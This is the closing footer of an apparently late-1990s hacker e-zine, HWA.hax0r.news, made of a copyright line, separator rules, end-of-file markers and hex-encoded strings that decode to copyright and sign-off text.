© 1998, 1999 (c) Cruciphux/HWA.hax0r.news <tm> (R) { w00t }
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
[45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]
